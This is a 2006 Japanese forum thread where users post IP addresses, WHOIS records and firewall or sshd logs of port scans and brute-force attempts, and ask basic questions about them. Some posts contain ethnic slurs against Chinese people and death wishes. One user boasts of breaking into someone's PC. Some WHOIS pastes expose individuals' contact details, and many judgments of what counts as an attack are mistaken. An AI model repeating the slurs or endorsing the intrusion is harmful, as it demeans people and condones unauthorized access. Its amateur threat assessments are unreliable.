名無しさん@お腹いっぱい。 :2006/01/16(月) 09:19:34
Jan 14 20:25:05 *** sshd[29532]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=dualpc0.iis.u-tokyo.ac.jp 東大 Jan 15 08:26:19 *** sshd[10402]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=219x123x39x114.ap219.ftth.ucom.ne.jp EPIONTECH CO.,Ltd
451 :
名無しさん@お腹いっぱい。 :2006/01/16(月) 13:26:49
ENTE MILITARE ALLEATO USA/NATO-US NAVY NAPOL えらいとこからきたw
パソコン持って逃げろ
85.37.190.232:8619 udp4 ENTE MILITARE ALLEATO USA/NATO-US NAVY いや、おいら軍事に関わるものなんて何も持ってなし、とりたてて悪い事やってねーつーのw 軍と付くものといえば、ケロロ軍曹のDVDくらいしかないよ(´・ω・`)
エシュロン?
219.102.54.134 445番ポート狙ってきてるんだが
SMURF攻撃180回 2006/01/10 17:35:22 - 2006/01/16 15:33:13 IPアドレス 207.38.8.27 ホスト名 aphexmaster1.gamespy.com IPアドレス割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
エシュロンってなつかしいなw
192.168.24.55:3067 等のローカルアドレスから、 家のサーバにpingでは無い不規則なアクセスログがよくある。 一人暮らしで、昼間は仕事でいない。 昼間に立ち上げてるのはそのサーバのみ。 その間、他にLANに繋がってる機器は無いはず。 無線LANは無いから外部からでは無いと思うんだが・・・。 どういった可能性がある?教えてエロい人。
461 :
名無しさん@お腹いっぱい。 :2006/01/18(水) 20:42:03
IPアドレス 206.223.150.120 ホスト名 tiger505.maido3.com IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし ノートン先生が騒いでおります。
>>461 そこはIn,Outともに弾いたほうがいいよ
463 :
名無しさん@お腹いっぱい。 :2006/01/18(水) 20:50:24
>>462 さん
すみません。In,Outとはなんですか?
464 :
名無しさん@お腹いっぱい。 :2006/01/18(水) 21:19:16
だから462が面白いんだろw
ポートスキャン49回 IPアドレス 202.93.87.190 ホスト名 f32.mail.vip.bbt.yahoo.co.jp IPアドレス割当国 ※ 日本 (JP) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし 氏ね
468 :
y :2006/01/19(木) 15:24:17
すみませんがこのIP抜いてもらえますか? この荒しは中傷激しいんです。 自分バカなもんでIP抜けないんですお。 222.7.56.143 おねがいします。
バカとか初心者とか自分で言えば 不勉強の免罪符になるとでも思っているのかね? バカだと思うならあきらめなさい PHSだし
473 :
名無しさん@お腹いっぱい。 :2006/01/20(金) 00:07:42
Relaying denied:
From ip-209-172-61-87.reverse.privatedns.com[209.172.61.87]
to
[email protected] : 1 Time(s)
こやつはsshアタックしてきたり、smtpアタックしてきたり。
常連ですか?
ポート1026あたりの叩きがまた増えてきた
475 :
名無しさん@お腹いっぱい。 :2006/01/20(金) 03:37:29
218.222.164.94 逝ってヨシ
ヤフーメールって使うとポートスキャンしてくるの? 何のために?
>>470 ヤフーメールを使ってればポートスキャンされてもしかたない
と言う意味に取れるがそのへんのトコ
>>476 に答えてやれ
あとオマエが早とちりで使用禁止した
>>471 は使ってないのに
ポートスキャンされてるらしいのでコメントしてやれ
CATVなんじゃね?
479 :
名無しさん@お腹いっぱい。 :2006/01/20(金) 11:53:37
みんなIP抜くのにどんなツール使っている?
480 :
名無しさん@お腹いっぱい。 :2006/01/20(金) 12:11:55
64.124.85.210.become.com
Domain Information: [ドメイン情報] a. [ドメイン名] KDDI.NE.JP b. [ねっとわーくさーびすめい] けーでぃーでぃーあい c. [ネットワークサービス名] KDDI d. [Network Service Name] KDDI k. [組織種別] ネットワークサービス l. [Organization Type] Network Service m. [登録担当者] KT6192JP n. [技術連絡担当者] SH1304JP p. [ネームサーバ] dns0.dion.ne.jp p. [ネームサーバ] dns1.dion.ne.jp [状態] Connected (2006/12/31) [登録年月日] 1999/12/27 [接続年月日] 2000/10/02 [最終更新] 2006/01/01 01:18:21 (JST)
IPアドレス 210.155.101.159 ホスト名 VV043000140128101155210031.gwrev.kddi.ne.j 割当国 ※ 日本 (JP) こいつしつこい。死ね。
ccTLD国名検索� �IPアドレス��61.121.9.87� �ホスト名��nttyma031087.tyma.nt.ftth.ppp.infoweb.ne.jp� Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 61.121.0.0/18 b. [ネットワーク名] INFOWEB f. [組織名] InfoWeb(富士通株式会社) g. [Organization] InfoWeb(Fujitsu Ltd.) m. [管理者連絡窓口] KH071JP n. [技術連絡担当者] KN6902JP n. [技術連絡担当者] TK13654JP p. [ネームサーバ] ns1.hyper.web.ad.jp p. [ネームサーバ] ns3.hyper.web.ad.jp [割当年月日] 2000/12/12 [返却年月日] [最終更新] 2003/11/07 11:47:32(JST) 上位情報 ---------- 富士通株式会社 (FUJITSU LIMITED) [割り振り] 61.121.0.0/17 下位情報 ---------- 該当するデータがありません。
IPアドレス 210.173.169.161
ホスト名 www3.asahi.com
割当国 ※ 日本 (JP)
Registrant:
Asahi Shimbun Tsukiji Chuo-ku
Tokyo
No Valid City, No Valid State
JP
Domain Name: ASAHI.COM
Administrative Contact:
Oaawaa, akoto
[email protected] Asahi Shimbun Tsukiji
Chuo-ku, Tokyo 1048011
JP
+81-3-5541-8949 +81-3-5541-8687
なんだこれ('A`)
iia, ysue
[email protected] Asahi Shimbun
5-3-2 Tsukiji
Chuo-ku, Tokyo 1048011
JP
+81-3-5541-8949
IPアドレス 210.159.238.64 ホスト名 PPPax814.kanagawa-ip.dti.ne.jp Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 210.159.208.0-210.159.255.255 b. [ネットワーク名] DTI-NET f. [組織名] 株式会社 ドリーム・トレイン・インターネット g. [Organization] DREAM TRAIN INTERNET INC. m. [管理者連絡窓口] MH4804JP n. [技術連絡担当者] MK10931JP p. [ネームサーバ] ns.dti.ad.jp p. [ネームサーバ] ns2.dti.ad.jp [割当年月日] 2000/03/23 [返却年月日] [最終更新] 2004/09/08 12:28:11(JST) 上位情報---------- 株式会社 ドリーム・トレイン・インターネット (Dream Train Internet Inc.) [割り振り] 210.159.128.0/17 こいつうざい
487 :
名無しさん@お腹いっぱい。 :2006/01/22(日) 17:19:04
IPアドレス 203.216.240.161 ホスト名 cs1.msg.tnz.yahoo.co.jp IPアドレス 割当国 ※ 日本 (JP) Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 203.216.224.0/19 b. [ネットワーク名] YAHOO-NET f. [組織名] ヤフー株式会社 g. [Organization] Yahoo Japan Corp. m. [管理者連絡窓口] TT9944JP n. [技術連絡担当者] TT9944JP p. [ネームサーバ] dnsg01.yahoo.co.jp p. [ネームサーバ] ns10.yahoo.co.jp [割当年月日] 2005/03/03 [最終更新] 2005/12/21 17:32:02(JST) 上位情報 ---------- 株式会社ブロードバンドタワー (BroadBand Tower, Inc.) [割り振り] 203.216.192.0/18 下位情報 ---------- 該当するデータがありません。
厨な質問でごめんなさい 203.216.192.0/18とは、203.216.192.0から203.216.255.255までの範囲 の事と理解していいでしょうか? スラッシュから後の数字、例えば上記の/18←はどういう意味なんですか
489 :
名無しさん@お腹いっぱい。 :2006/01/23(月) 01:44:55
あるエロサイトをクリックしたらワンクリック系で それ以来「HyperText 転送プロトコル (HTTP)」で 数分おきに「警告」の画面が出てくるんですけど、 ブロックする方法教えてください。 初心者ですみませんが宜しくお願いします。
TCP SYN FLOOD攻撃 2006/01/23 02:01:12 - 2006/01/23 02:07:36 25回 IPアドレス 218.40.56.3
Jan 24 01:31:25 *** sshd[17904]: Did not receive identification string from 61.193.184.72 Jan 24 01:34:11 *** sshd[17905]: input_userauth_request: illegal user mata Jan 24 01:34:11 *** sshd[17905]: Failed password for illegal user mata from 61.193.184.72 port 48500 ssh2 Jan 24 01:34:11 *** sshd[17905]: Received disconnect from 61.193.184.72: 11: Bye Bye Jan 24 01:34:11 *** sshd[17906]: input_userauth_request: illegal user sato Jan 24 01:34:11 *** sshd[17906]: Failed password for illegal user sato from 61.193.184.72 port 48538 ssh2 Jan 24 01:34:11 *** sshd[17906]: Received disconnect from 61.193.184.72: 11: Bye Bye Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 61.193.184.64/27 b. [ネットワーク名] CMS-JAPAN f. [組織名] シー・エム・エス・ジャパン株式会社 g. [Organization] CMS Japan K.K.
Pネットワークアドレス 210.172.0.208/28 ネットワーク名 IR-NET 組織名 有限会社インターライズ Organization Inter Rise Inc. 管理者連絡窓口 FS533JP 技術連絡担当者 FS533JP ネームサーバ 割当年月日 2004/10/07 返却年月日 最終更新 2004/10/13 10:34:02(JST) 上位情報 ソニー株式会社 (SONY Corporation) 割り振り 210.172.0.0/19 ビットドライブ (bit-drive) SUBA-330-041 [ SUBA ] 210.172.0.0 下位情報 該当するデータがありません。 なにがしたいねん?
あぁ、なんか知らんうちにwinstallっていうファイルがあるし…。
IPアドレス 220.102.221.249 ホスト名 FLA1Afd249.tky.mesh.ad.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 東京都 市外局番 -- 接続回線 xDSL いい加減にしろ
496 :
名無しさん@お腹いっぱい。 :2006/01/25(水) 22:51:28
ホスト名からIPアドレスを調べるサイト等はありますか?
ある
498 :
名無しさん@お腹いっぱい。 :2006/01/26(木) 00:02:04
61.46.139.92 61.46.139.92 61.46.139.92 61.46.139.92 61.46.139.92 61.46.139.92 61.46.139.92 61.46.139.92 61.46.139.92
500 :
名無しさん@お腹いっぱい。 :2006/01/26(木) 00:17:08
とりあえず、ドメイン覚えてるから変な事したら通報するぉwww 誰に言ってるのかは分かってるだろうけど。
501 :
496 :2006/01/26(木) 01:34:19
>>499 希望する内容のサイトがありました。ありがとうございました。
「ホスト IP」等でぐぐっても出てこなかったのに・・・
うちのルータ リモートホスト出ないからめんどい
最近ルーター導入して、ファイアウォール通知する設定したら不正アクセスの多さにビックリしたよ…。 ところでそのアクセスの種類なんだけど、 ・不正なパケット ・TCP SYN FLOOD攻撃 ・ポートスキャン ・SMURF攻撃 ・IP SPOOFING攻撃 ・LAND攻撃 ・UDPポートループバック攻撃 どういう攻撃なのかさっぱりわからんので、解説お願いできないでしょうか? 解説サイトでも全然OKですので。
初心者は調べなくても質問していいとでもお思いでしょうか? そのままググってみてそれでもわからなければまた来てください
505 :
名無しさん@お腹いっぱい。 :2006/01/26(木) 13:34:52
>>505 苦情メールって効果あるの?逆効果じゃないか?
http://marimo.org/spamlist.html 拒否るか、プロバイダとか、あらゆる権力動かして止める。
国内なら、多少は法律あるから対処可能だろうけどさ。
海外とか、経由してたりすると難しいんじゃね?
そもそも、自鯖なのかどうかでもだいぶ違ってくるような・・・
可能なら、自分のアドをでかいメールで埋めて許容限界にしておいて、
受け取れねーよ。を返させるぐらいしか思いつかん。
192.168.11.1 ↑ウイルスバスター2005がパトロールした結果こいつが出てきた 初歩的なことで申し訳ないんだけど、どういう状況なのか教えて欲しいッス 俺のMYPC覗かれてんの? ってかこういう場合どうすればいいの?
ネタはよそでやれ。
いやネタじゃなくてガチ サーチしても引っかからないからちょっち心配
>>509 コマンドプロンプト開いてipconfigってやった時にデフォルトゲートウェイに192.168.11.1とか書いてあったら怒るよ
511 :
名無しさん@お腹いっぱい。 :2006/01/26(木) 21:38:35
IP: 218.46.162.128 DNS: EATcf-515p128.ppp15.odn.ne.jp
コマンドプロンプトさえ分からないので初心者スレ行ってきます
>>510 それって自分のIPが出るんじゃねーの? って事?
221.25.28.7 xmas scan うぜー
Name: softbank221025028007.bbtec.net Address: 221.25.28.7 まーだ続けんのかよ うぜーな
516 :
名無しさん@お腹いっぱい。 :2006/01/26(木) 23:54:09
133.205.239.65,3211 Trojan送りつけるのって犯罪だべ
517 :
名無しさん@お腹いっぱい。 :2006/01/27(金) 00:20:23
こいつらうざい 2006/01/27 00:15:14 softbank218126078033.bbtec.net(218.126.78.33) 2006/01/27 00:15:25 211.204.130.43(211.204.130.43) 2006/01/27 00:17:12 OTUfb-01p2-5.ppp11.odn.ad.jp(219.66.179.5) 2006/01/27 00:17:28 bf-125.smn.enjoy.ne.jp(210.141.59.253) 2006/01/27 00:18:57 ZM041181.ppp.dion.ne.jp(222.8.41.181) 2006/01/27 00:19:16 ipvr5.csie.ncu.edu.tw(140.115.156.195) 全て TCPポート1563
この中で実際ハッキングされた奴いてる? 何か目に見える様なことされた?
520 :
名無しさん@お腹いっぱい。 :2006/01/27(金) 17:40:41
UDPポート 33436 のアタック しつこい 2006/01/27 17:31:57 performance-check-via-Level3.THIS_IS_HARMLESS-It_is_a_Traceroute_or_Ping_packet.BGP-route-control.data393.net(208.42.224.236) 2006/01/27 17:38:34 performance-check-via-Level3.THIS_IS_HARMLESS-It_is_a_Traceroute_or_Ping_packet.BGP-route-control.data393.net(208.42.224.236) 2006/01/27 17:38:39 performance-check-via-Level3.THIS_IS_HARMLESS-It_is_a_Traceroute_or_Ping_packet.BGP-route-control.data393.net(208.42.224.236) 2006/01/27 17:38:43 performance-check-via-Level3.THIS_IS_HARMLESS-It_is_a_Traceroute_or_Ping_packet.BGP-route-control.data393.net(208.42.224.236) 2006/01/27 17:38:48 performance-check-via-Level3.THIS_IS_HARMLESS-It_is_a_Traceroute_or_Ping_packet.BGP-route-control.data393.net(208.42.224.236) 2006/01/27 17:38:53 performance-check-via-Level3.THIS_IS_HARMLESS-It_is_a_Traceroute_or_Ping_packet.BGP-route-control.data393.net(208.42.224.236)
俺と同じように不正アクセスされてるおまいらをみてなんか嬉しいよ・・・ヽ(`Д´)ノウワァァン
522 :
名無しさん@お腹いっぱい。 :2006/01/27(金) 23:14:55
こないださP2PやらFTP使ってる輩のPCに進入したんだが それを知ったご当人が顔真っ赤にして「訴える」とかやたら勢い込んでるんだが 普通に考えて無理だわなw それどころかそいつ自身P2P使用について罪に問われるんじゃないか? そもそもそいつにもマシンにも実害自体は与えてないしw
524 :
名無しさん@お腹いっぱい。 :2006/01/27(金) 23:21:45
525 :
名無しさん@お腹いっぱい。 :2006/01/27(金) 23:28:35
俺は正直迷惑メールのメアドを晒したいがスレ違いだ
>>525 なにもいじらなかったとしても本人の気持ちを考えろってことを言いたかった
527 :
名無しさん@お腹いっぱい。 :2006/01/28(土) 00:22:33
進入しただけでも積荷は問われるんじゃなかったっけ?
528 :
名無しさん@お腹いっぱい。 :2006/01/28(土) 16:32:37
222.170.114.149 IPアドレス 222.170.114.149 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 中国 (CN) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
529 :
名無しさん@お腹いっぱい。 :2006/01/28(土) 16:33:41
219.147.192.118 IPアドレス 219.147.192.118 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 中国 (CN) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
530 :
名無しさん@お腹いっぱい。 :2006/01/28(土) 16:43:24
61.46.139.92 61.46.139.92 61.46.139.92 61.46.139.92 61.46.139.92 61.46.139.92 61.46.139.92 61.46.139.92 61.46.139.92 ここうぜーーーーーー
210.236.186.119 222.10.186.94 死ね!!
532 :
名無しさん@お腹いっぱい。 :2006/01/28(土) 16:53:54
219.111.127.64 さっきアクセスされたので晒しあげ
61.124.202.87 鬱陶しい輩だが、国内のしかも同じプロバイダのIPだった。 よってこいつを単体でアクセス制限
534 :
名無しさん@お腹いっぱい。 :2006/01/28(土) 17:21:51
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 203.141.32.0/20
b. [ネットワーク名] YAHOO-NET
f. [組織名] ヤフー株式会社
g. [Organization] Yahoo Japan Corp.
m. [管理者連絡窓口] TT9944JP
n. [技術連絡担当者] TT9944JP
p. [ネームサーバ] dnsg01.yahoo.co.jp
p. [ネームサーバ] ns10.yahoo.co.jp
[割当年月日] 2003/02/07
[最終更新] 2005/12/21 17:56:04(JST)
上位情報
----------
株式会社ブロードバンドタワー (BroadBand Tower, Inc.)
[割り振り] 203.141.32.0/19
下位情報
----------
該当するデータがありません。
Contact Information: [担当者情報]
a. [JPNICハンドル] TT9944JP
b. [氏名] 橘 俊男
c. [Last, First] Tachibana, Toshio
d. [電子メイル]
[email protected] f. [組織名] ヤフー株式会社
g. [Organization] Yahoo Japan Corporation
k. [部署] システム統括部サイトオペレーション
l. [Division] Site Operations
o. [電話番号] 03-6440-6000
p. [FAX番号] 03-6440-6265
y. [通知アドレス]
[email protected] [最終更新] 2004/06/01 17:35:02 (JST)
[email protected]
535 :
名無しさん@お腹いっぱい。 :2006/01/28(土) 17:25:30
Pアドレス 219.28.108.65 ホスト名 softbank219028108065.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 兵庫県 市外局番 -- 接続回線 xDSL
>>421 IPの末尾が1だったら
TCPポート1563
とか
>520 のようなアクセスが来るらしい
現在は末尾1じゃないから TCP:1563とか>520 のアクセス来てない
220.219.199.249 延々と叩いてくるの勘弁して下さい
IPアドレス 69.28.181.55 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
539 :
名無しさん@お腹いっぱい。 :2006/01/30(月) 11:12:23
58.138.16.99 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 58.138.0.0/18 b. [ネットワーク名] PPP-EXCITE f. [組織名] エキサイト株式会社 g. [Organization] Excite Japan Co., Ltd. m. [管理者連絡窓口] EK861JP n. [技術連絡担当者] JF254JP p. [ネームサーバ] ns00.cdn-japan.com p. [ネームサーバ] ns01.cdn-japan.com [割当年月日] 2005/05/26 [最終更新] 2005/05/26 10:47:07(JST) 上位情報 ---------- 株式会社インターネットイニシアティブ (Internet Initiative Japan Inc.) [割り振り] 58.138.0.0/17 死ね
540 :
名無しさん@お腹いっぱい。 :2006/01/31(火) 16:46:54
あなたが検索されたアドレス[ 222.149.131.222 ]のJPNICからの応答は以下の通りです。 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 222.149.128.0/18 b. [ネットワーク名] OCN f. [組織名] オープンコンピュータネットワーク g. [Organization] Open Computer Network m. [管理者連絡窓口] AY1361JP n. [技術連絡担当者] MO081JP n. [技術連絡担当者] KK551JP n. [技術連絡担当者] IM657JP p. [ネームサーバ] ns-kg001.ocn.ad.jp p. [ネームサーバ] ns-kn001.ocn.ad.jp [割当年月日] 2004/03/04 [最終更新] 2004/03/04 10:22:05(JST) 上位情報 ---------- エヌ・ティ・ティ・コミュニケーションズ株式会社 (NTT COMMUNICATIONS CORPORATION) [割り振り] 222.144.0.0/13
219.129.21.116 支那かららしいが何度も何度もいい加減にしてくれよと…。
543 :
名無しさん@お腹いっぱい。 :2006/02/02(木) 16:40:28
IPアドレス 220.102.188.1 ホスト名 FLH1Abi001.osk.mesh.ad.jp Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 220.102.0.0/16 b. [ネットワーク名] BIGLOBE-9 f. [組織名] BIGLOBEサービス(日本電気株式会社) g. [Organization] NEC Corporation m. [管理者連絡窓口] NK032JP n. [技術連絡担当者] MK11728JP p. [ネームサーバ] ns02.mesh.ad.jp p. [ネームサーバ] ns03.mesh.ad.jp [割当年月日] 2004/04/06 [返却年月日] [最終更新] 2004/04/06 18:53:06(JST) 上位情報 ---------- 日本電気株式会社 (NEC Corporation) [割り振り] 220.102.0.0/16 下位情報 ---------- 該当するデータがありません。 頼むから氏んでくれ
544 :
名無しさん@お腹いっぱい。 :2006/02/02(木) 18:21:22
60.238.82.63 ↑厨のIP
IPアドレス 70.86.55.218 ホスト名 mail.symb0l2watch.com IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
546 :
名無しさん@お腹いっぱい。 :2006/02/02(木) 23:51:13
220.146.188.45
547 :
名無しさん@お腹いっぱい。 :2006/02/04(土) 16:07:56
検索結果 IPアドレス 219.171.28.160,2856 ホスト名 softbank219171028160.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 宮城県 市外局番 -- 接続回線 xDSL
548 :
TCP SYN FLOOD攻撃 :2006/02/04(土) 17:20:18
221.14.246.237 2006/02/01 17:55:19 - 2006/02/04 15:19:30 130回 チャンコロまじうぜえ
221.14.246.236 221.14.246.235 221.14.246.254 221.14.246.226 221.14.246.229 221.14.246.228 221.14.246.230
550 :
名無しさん@お腹いっぱい。 :2006/02/05(日) 20:52:40
>>548-549 あーうちだけじゃないんだなぁ。
これで弾こう。
221.13.128.0 - 221.15.255.255
221.5.251.195 中華人民共和国
sshdが刺激されました。(ログはnlでカウント付き) 国内から馬鹿なことするなよ。 1 Feb 4 03:34:46 hostx sshd[9376]: Illegal user a from 61.213.76.189 2 Feb 4 03:34:47 hostx sshd[9379]: Illegal user b from 61.213.76.189 (中略) 1500 Feb 4 04:15:53 hostx sshd[14574]: Illegal user Owner from 61.213.76.189 1501 Feb 4 04:15:53 hostx sshd[14577]: Illegal user goober from 61.213.76.189
j076189.ppp.asahi-net.or.jp
554 :
名無しさん@お腹いっぱい。 :2006/02/06(月) 23:24:56
555 :
名無しさん@お腹いっぱい。 :2006/02/06(月) 23:38:38
219.146.78.59 チャンコロいいかげんにせいよ!
218.163.130.210:2061 218.163.130.210:24087
557 :
名無しさん@お腹いっぱい。 :2006/02/07(火) 03:23:45
サービス: Windows ファイル共有 ポート: 139 モード: TCP IP アドレス: 61.121.33.16 ホスト名: ntmiex005016.miex.nt.isdn.ppp.infoweb.ne.jp 毎日来る。 そして今日はとてつもなくしつこい、、、、、、、、
2006/02/05 23:38:26 TCP 80 221.117.59.154(221.117.59.154) 2006/02/05 23:38:27 TCP 1080 221.117.59.154(221.117.59.154) 2006/02/05 23:38:28 TCP 3128 221.117.59.154(221.117.59.154) 2006/02/05 23:38:29 TCP 8080 221.117.59.154(221.117.59.154) 2006/02/07 09:47:37 TCP 80 221.117.59.154(221.117.59.154) 2006/02/07 09:47:38 TCP 1080 221.117.59.154(221.117.59.154) 2006/02/07 09:47:39 TCP 3128 221.117.59.154(221.117.59.154) 2006/02/07 09:47:40 TCP 8080 221.117.59.154(221.117.59.154)
560 :
名無しさん@お腹いっぱい。 :2006/02/09(木) 01:14:42
2006/02/08 23:32:42通信の要求 210.239.148.89 TCP(1746) Domain Information: [ドメイン情報] a. [ドメイン名] BEAUTECHLAB.CO.JP e. [そしきめい] かぶしきがいしゃびゅーてっくらぼ f. [組織名] 株式会社ビューテックラボ g. [Organization] BeautechLab Corporation k. [組織種別] 株式会社 l. [Organization Type] Company m. [登録担当者] IM269JP n. [技術連絡担当者] HI3229JP n. [技術連絡担当者] RS006JP p. [ネームサーバ] blc.beautechlab.co.jp p. [ネームサーバ] blcsv9x.beautechlab.co.jp p. [ネームサーバ] ns1.bit-drive.ne.jp [状態] Connected (2006/11/30) [登録年月日] 1999/11/26 [接続年月日] 1999/11/30 [最終更新] 2005/12/01 01:12:20 (JST) なんの用だ
561 :
名無しさん@お腹いっぱい。 :2006/02/09(木) 01:15:22
あごめん 全部張っちゃったorz
562 :
名無しさん@お腹いっぱい。 :2006/02/09(木) 17:19:08
IPアドレス 220.109.20.140 ホスト名 i220-109-20-140.s02.a017.ap.plala.or.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 石川県 市外局番 -- 接続回線 xDSL
563 :
名無しさん@お腹いっぱい。 :2006/02/09(木) 19:12:14
IPアドレス 210.159.149.164 ホスト名 PPPbm1164.tokyo-ip.dti.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 東京都 市外局番 -- 接続回線 光
softbank221029031024.bbtec.net
IPアドレス 221.187.59.179 ホスト名 p4179-ipbf17souka.saitama.ocn.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 埼玉県 市外局番 -- 接続回線 光 しつこい。
566 :
名無しさん@お腹いっぱい。 :2006/02/11(土) 00:14:02
--:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.89.162:3261 -> **.***.**.**:135) --:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.89.26:1341 -> **.***.**.**:135) --:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.89.26:1341 -> **.***.**.**:135) --:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.45.49:3777 -> **.***.**.**:135) --:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.117.73:1428 -> **.***.**.**:135) --:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.45.49:1574 -> **.***.**.**:135) --:--:-- LOG_WARNING S03:MSQ: Discard packet. TCP(59.190.89.104:4394 -> **.***.**.**:135)
567 :
名無しさん@お腹いっぱい。 :2006/02/11(土) 03:21:42
送信日時 2006-02-11 02:45:27 送信日時 2006-02-11 02:45:30 IPアドレス 210.157.21.152 ホスト名 unused-210-157-021-152.interq.or.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
>>566 あんたのISPは eonet.ne.jp だろ
IP:218.183.240.109 :Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
softbank218122214010.bbtec.net
PC初心者たくさん居るスレはこのスレですか 晒す前にもっとNWについて勉強しようね^−^
PC上級者キテタ Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒(。A。)!!!
ttp://www.dshield.org/ 1026って、Messenger Spam狙い?
発信元を偽装しているかもしれないけど中国方面からのものがコンスタントに来るね。
鬱陶しいからTCP445と135と一緒にUDP1026と1028のログは取らないようにしたら
ものすごく静かで驚くw
パソコンの電源を切ってる時にもルータのアクセスランプがピカピカ点滅する時があるんですが、これって不正進入されかけてるのかなぁ?
>>574 そのルータがモデムルータならその機器自体がWAN側IP取っていて
そのWAN側IPに対して侵入を試みようとしてきてるだけでしょ。
通常ならルータは必要ないものは閉じてるから点滅してても無視するだけでいい。
PCが動いていても必要なもの以外のポート開けやDMZホストに指定しなければ問題ない。
>>575 書き忘れましたが、モデムルータです。
よって、WAN側IPは確かに常に持ってますよ。(電源入れてる間は)
やっぱりルータまでのアクセスはされるもんなのですね。ご回答ありがとうございました。
中国、韓国、台湾、香港、イタリア、オランダ、メキシコ、ブラジルがUzeeeeeeee!!
中国はホントダメだね
579 :
名無しさん@お腹いっぱい。 :2006/02/13(月) 05:18:43
あなたが検索されたアドレス[ 59.158.170.134 ]のJPNICからの応答は以下の通りです。 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 59.158.170.128/29 b. [ネットワーク名] HG0004230405 f. [組織名] broadgate g. [Organization] broadgate m. [管理者連絡窓口] AT047JP n. [技術連絡担当者] AT047JP p. [ネームサーバ] [割当年月日] 2005/07/26 [最終更新] 2005/07/26 14:29:31(JST) 上位情報 ---------- 株式会社ユーズコミュニケーションズ (U's Communications Corp.) [割り振り] 59.158.0.0/15 株式会社ユーズコミュニケーションズ (U's communications Corp.) SUBA-468-0JK [SUBA] 59.158.170.0/24
あぼーん
581 :
名無しさん@お腹いっぱい。 :2006/02/13(月) 11:55:10
あなたが検索されたアドレス[ 220.146.130.229 ]のJPNICからの応答は以下の通りです。 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 220.146.0.0/16 b. [ネットワーク名] INFOWEB f. [組織名] InfoWeb(富士通株式会社) g. [Organization] InfoWeb(Fujitsu Ltd.) m. [管理者連絡窓口] KH071JP n. [技術連絡担当者] TK13654JP n. [技術連絡担当者] KN6902JP p. [ネームサーバ] ns1.hyper.web.ad.jp p. [ネームサーバ] ns3.hyper.web.ad.jp [割当年月日] 2003/11/14 [最終更新] 2003/11/20 16:45:03(JST) 上位情報 ---------- 富士通株式会社 (FUJITSU LIMITED) [割り振り] 220.146.0.0/15
Whois全部貼ってるおまえ ウザいから書き込むな!
[技術連絡担当者]とか「上位情報」とかをNGワードにしてあぼ〜んしとけよ 若しくはこのスレ自体見るな おまえいなくてもまったく困らんから
IPアドレス 66.97.133.101 ホスト名 66-97-133-101.viawest.net IPアドレス 割当国 ※ アメリカ合衆国 (US トロイの木馬 61番ポートを狙ってきた。
ここ見て、初めてルーターのログみたんだけど、結構アクセスしてるんだね 南米、中国がわりとあった。 スパム攻撃して楽しいのかな
PCがあっても、たいして他に何もすることねーんじゃね? それか、馬鹿だからゾンビとか、踏み台なりまくりんぐに気付かないっぽい ま、中韓は国策の反日教育の影響だろうけどなw
すみません。ここにあるような不正アクセスされたとして、どんな対策をすれば良いんでしょうか? ファイヤーウォール使ってれば、放っておいても問題ないの?
>>587 こういうアクセスがあったよ。でも止めたよ。
っていう事をお知らせしてるだけだから気にする必要はない。
589 :
587 :2006/02/14(火) 23:30:09
>>588 ありがとうございます。
ここ2、3日ファイヤーウォールが急に反応するようになったのですが、
ググってもなんだか難しくてよく分からなかったもので・・・
169.254.239.240
591 :
名無しさん@お腹いっぱい。 :2006/02/15(水) 23:56:42
219.182.185.1からアクセスが来てるってファイアウォールのメッセージが出続けてます。 何とかならないでしょうか?
592 :
名無しさん@お腹いっぱい。 :2006/02/16(木) 04:46:25
61.121.33.19 ntmiex005199.miex.nt.isdn.ppp.infoweb.ne.jp
ルーターのログ見ると5秒おきくらいにTCP port 135や445にいろいろなところからアクセスがくるんですけど 多すぎますかね?ファイヤーウォール無しなので心配。
>>594 ルータに弾いたとログが残ってるなら問題ないと思う。
IPアドレス 203.250.33.116 ホスト名 pc033116.cataegu.ac.kr IPアドレス 割当国 ※ 該当なし 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
>>595 ありがとうございます。どうやらルーターが弾いているようなので一安心です。
それにしてもまさかこんなに来てるとは…
598 :
名無しさん@お腹いっぱい。 :2006/02/17(金) 17:31:18
